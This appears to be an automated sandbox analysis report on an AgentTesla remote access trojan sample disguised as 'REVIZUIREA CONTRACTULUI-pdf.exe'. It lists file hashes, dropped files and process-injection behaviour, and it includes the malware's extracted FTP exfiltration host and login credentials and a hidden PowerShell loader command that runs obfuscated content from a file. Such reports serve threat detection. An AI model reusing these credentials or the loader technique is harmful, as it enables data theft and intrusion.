Analysis
-
max time kernel
94s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231130-en -
resource tags
arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system -
submitted
07/12/2023, 07:26
Static task
static1
Behavioral task
behavioral1
Sample
REVIZUIREA CONTRACTULUI-pdf.exe
Resource
win7-20231201-en
Behavioral task
behavioral2
Sample
REVIZUIREA CONTRACTULUI-pdf.exe
Resource
win10v2004-20231130-en
General
-
Target
REVIZUIREA CONTRACTULUI-pdf.exe
-
Size
708KB
-
MD5
380787d6ecbcc6cd4dd23df9da174c35
-
SHA1
9298497f6ed0c8ab161a3c4a85c3a99b45613581
-
SHA256
2dc56a2f3b12cbdb34a73d5d90e9759d48cc8eda0c8833cd64005559469a1058
-
SHA512
8c75231ba6c44a946fabe2d12eb5e0980959a8cf4f9fabb6b6831c52d96b55d1d2cfd0ed84479b59192b3572a7a57888557311f6639c340d04fb4b24c235cb9b
-
SSDEEP
12288:vwFGHEXzSTDHfwvNJUcXGzJTaylgimtdYM3O0V7bbW:v5HEXzI0NNXoJThlgZtub0V7u
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.vvspijkenisse.nl - Port:
21 - Username:
[email protected] - Password:
playingboyz231
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini REVIZUIREA CONTRACTULUI-pdf.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2840 msbuild.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3376 powershell.exe 2840 msbuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3376 set thread context of 2840 3376 powershell.exe 92 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski REVIZUIREA CONTRACTULUI-pdf.exe File created C:\Program Files (x86)\cockling.lnk REVIZUIREA CONTRACTULUI-pdf.exe File opened for modification C:\Program Files (x86)\cockling.lnk REVIZUIREA CONTRACTULUI-pdf.exe File opened for modification C:\Program Files (x86)\Kldebonnets.kod REVIZUIREA CONTRACTULUI-pdf.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\bagvognen.lnk REVIZUIREA CONTRACTULUI-pdf.exe File opened for modification C:\Windows\Calottes.Doo REVIZUIREA CONTRACTULUI-pdf.exe File opened for modification C:\Windows\bagvognen.lnk REVIZUIREA CONTRACTULUI-pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3492 2840 WerFault.exe 92 -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 2840 msbuild.exe 2840 msbuild.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 2840 msbuild.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4348 wrote to memory of 3376 4348 REVIZUIREA CONTRACTULUI-pdf.exe 87 PID 4348 wrote to memory of 3376 4348 REVIZUIREA CONTRACTULUI-pdf.exe 87 PID 4348 wrote to memory of 3376 4348 REVIZUIREA CONTRACTULUI-pdf.exe 87 PID 3376 wrote to memory of 2840 3376 powershell.exe 92 PID 3376 wrote to memory of 2840 3376 powershell.exe 92 PID 3376 wrote to memory of 2840 3376 powershell.exe 92 PID 3376 wrote to memory of 2840 3376 powershell.exe 92 PID 3376 wrote to memory of 2840 3376 powershell.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\REVIZUIREA CONTRACTULUI-pdf.exe"C:\Users\Admin\AppData\Local\Temp\REVIZUIREA CONTRACTULUI-pdf.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Calypso=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Beskyttelsesmidler\Unlighted\Splanchnographer.Kna';$Kalispel=$Calypso.SubString(53259,3);.$Kalispel($Calypso)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 14764⤵
- Program crash
PID:3492
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2840 -ip 28401⤵PID:472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32B
MD5a8ca1db6ae34f5e5c152094f44f92476
SHA19fe0fd4e6907c4f9099d2533c3bade4ffa0968e7
SHA2561f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3
SHA512e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD55d12c9d49bef39741a5077c2ea1a3118
SHA1b6075ecd3a820510b37ca62f1d74d95f599c2fdc
SHA25641b05b53faaef42cacc83c7c37c4e47bcf43eaef1fea8ef28b9d90a5bcb555b6
SHA51227eae2e897e39de8b06a59454c8e49273386e066e5900d19f99b415ebbddc150e42794968774412c0f72bf5c6f0e1924469894ca013f6b98a081b411c8b1bf86
-
Filesize
309KB
MD5f5017cc8df8d48957ca45afacd609df3
SHA1e769c4d4e9ab2101f6f088135efd580a9ef9e4da
SHA25661c7f23798426b06bbfb489a893a89567db6c8c84700d69a14e410c4e52b4366
SHA512d6215ee0dc6b3fc3e875c88dbf6c012cc17e20bd0812cfe8ab2f2b66cc3116a5705f25af99986d55fb10b198019452f6c9c4cae8996a76f2a52630efdab0083e